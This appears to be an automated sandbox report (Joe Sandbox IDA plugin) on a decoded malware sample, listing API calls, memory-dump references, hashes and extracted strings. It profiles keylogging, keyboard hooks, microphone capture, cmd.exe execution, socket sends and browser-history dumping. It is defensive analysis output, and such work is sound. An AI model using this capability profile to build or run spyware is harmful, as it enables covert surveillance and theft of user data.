                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                                                                                                                                                                                                                                              • String ID: XCG$`AG$>G
                                                                                                                                                                                                                                                                                                                              • API String ID: 2334542088-2372832151
                                                                                                                                                                                                                                                                                                                              • Opcode ID: abf96a2e131c113fa51a5dcca27fb2f6e317e9ae875eadb6cd82fc6fd6a5dabd
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 51992e77998e29381c1adf086b38d2340c1e01042c89ae8fe5bc0f900910b53e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: abf96a2e131c113fa51a5dcca27fb2f6e317e9ae875eadb6cd82fc6fd6a5dabd
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E5132321042405AC325F775D8A2AEF73E5ABE4308F50493FF94A631E2EE785949C69E
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe,00000104), ref: 02834C1D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02834CE8
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02834CF2
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, xrefs: 02834C14, 02834C1B, 02834C4A, 02834C82
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                              • API String ID: 2506810119-1019292157
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 80041ebbf1974f6c38280cb2242725363c447aed8f2bd5040ecced087da9d4ba
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 97f1e333df752f454336809d659ce9f8347990dbc7464112706a4e65ecff6ede
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80041ebbf1974f6c38280cb2242725363c447aed8f2bd5040ecced087da9d4ba
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C531627DA40218AFEB22DF9D988099EBBFDEB85314B104196E804D7240E7719A42CFA1
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 10004988
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 10004992
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ea482594aa6774e91285724cbac881b05db441b3c504b9e64c6bf29ac5aef023
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 5dc71b71bde44702d26a4cbc12f9298653d6fc4ab722c143c4ed6f2fd59d79f2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea482594aa6774e91285724cbac881b05db441b3c504b9e64c6bf29ac5aef023
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C31BC763053058BAB24CF5CF88095BB3E9FF857913120A3EE546C7619DB31E91487A9
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 100040D8
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 100040E2
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b8c36c1bc06ab5f4c21a442c8b2e8ddece411d5689db3b951c93075d282b484f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: dceabf25fecf4d0f8060b32b9c351c32afdfa4cc9e92bfec45e796551365fa88
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8c36c1bc06ab5f4c21a442c8b2e8ddece411d5689db3b951c93075d282b484f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9431D4B6700700CFE724CF5CE880B5BB3E5EF90691B120A2EF652C7649CB72E95087A5
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                                                                                                                                                                              • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                                                                                                                                                                                                                                              • API String ID: 368326130-2663660666
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044DDF7: _abort.LIBCMT ref: 0044DE29
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044DDF7: _free.LIBCMT ref: 0044DE5D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044DA6C: GetOEMCP.KERNEL32(00000000,?,?,0044DCF5,?), ref: 0044DA97
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044DD50
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044DD86
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                                                                                                                                              • String ID: 09~$09~
                                                                                                                                                                                                                                                                                                                              • API String ID: 2991157371-3801775775
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                                                                                                                                                                                              • String ID: Offline Keylogger Started
                                                                                                                                                                                                                                                                                                                              • API String ID: 465354869-4114347211
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                                                                                                                                                                                                              • String ID: Online Keylogger Started
                                                                                                                                                                                                                                                                                                                              • API String ID: 112202259-1258561607
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 7a24530a8c6c7bf2449bbacb2a28f02b771769fe06f38f3294ab8e1f5cdd9e90
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 11da804b7f4806bc819379157d14523832a74cbdaa40f75774c11a3885c9476d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a24530a8c6c7bf2449bbacb2a28f02b771769fe06f38f3294ab8e1f5cdd9e90
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A01C4916003093AE62076368C8BDBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAD9
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAE3
                                                                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0044AB0E
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                                                                              • String ID: `@
                                                                                                                                                                                                                                                                                                                              • API String ID: 2583163307-951712118
                                                                                                                                                                                                                                                                                                                              • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 27d3a2ced18f85a81fd98b99658ced531467de2cab5132fdd739c317d4e1371d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56016F3664452016F7215274694977F774D8B42738F25036FF904972D2DD6D8CC5C19F
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1000A2BF
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1000A2D1
                                                                                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 1000A308
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000C804: RaiseException.KERNEL32(?,?,1000A5C5,?,?,?,?,?,?,?,?,1000A5C5,?,10029888,?), ref: 1000C863
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow
                                                                                                                                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 282849329-2556327735
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 13f2c9ee93d70e8ef895b86efb1adb1bbc0a17a491a056a2fa8bd6fe5aea7e05
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 3b0e7b0924b02afa82a32a789def5d0431f475eb5fa42c660e1d048d1314c2f9
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13f2c9ee93d70e8ef895b86efb1adb1bbc0a17a491a056a2fa8bd6fe5aea7e05
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C01191342087409BF732CF188881B0A77F1EF43680F614B5CF4D65B28ACB72B6848762
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                                                                                                                                                                                              • String ID: Connection Timeout
APIs
• waveInPrepareHeader.WINMM(007DE758,00000020,?,?,00000000,00475B90,00473EE8,?,00000000,00401913), ref: 00401747
• waveInAddBuffer.WINMM(007DE758,00000020,?,00000000,00401913), ref: 0040175D
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: wave$BufferHeaderPrepare
• String ID: T=G$X}
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
  • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 004347EC
  • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 00434810
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
• String ID: bad locale name
APIs
• ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: ExecuteShell
• String ID: /C $cmd.exe$open
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                                                                                                                                                                              • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                                                                                                                                                              • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                                                                                                                                                                                                              • String ID: pth_unenc
                                                                                                                                                                                                                                                                                                                              • API String ID: 3123878439-4028850238
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
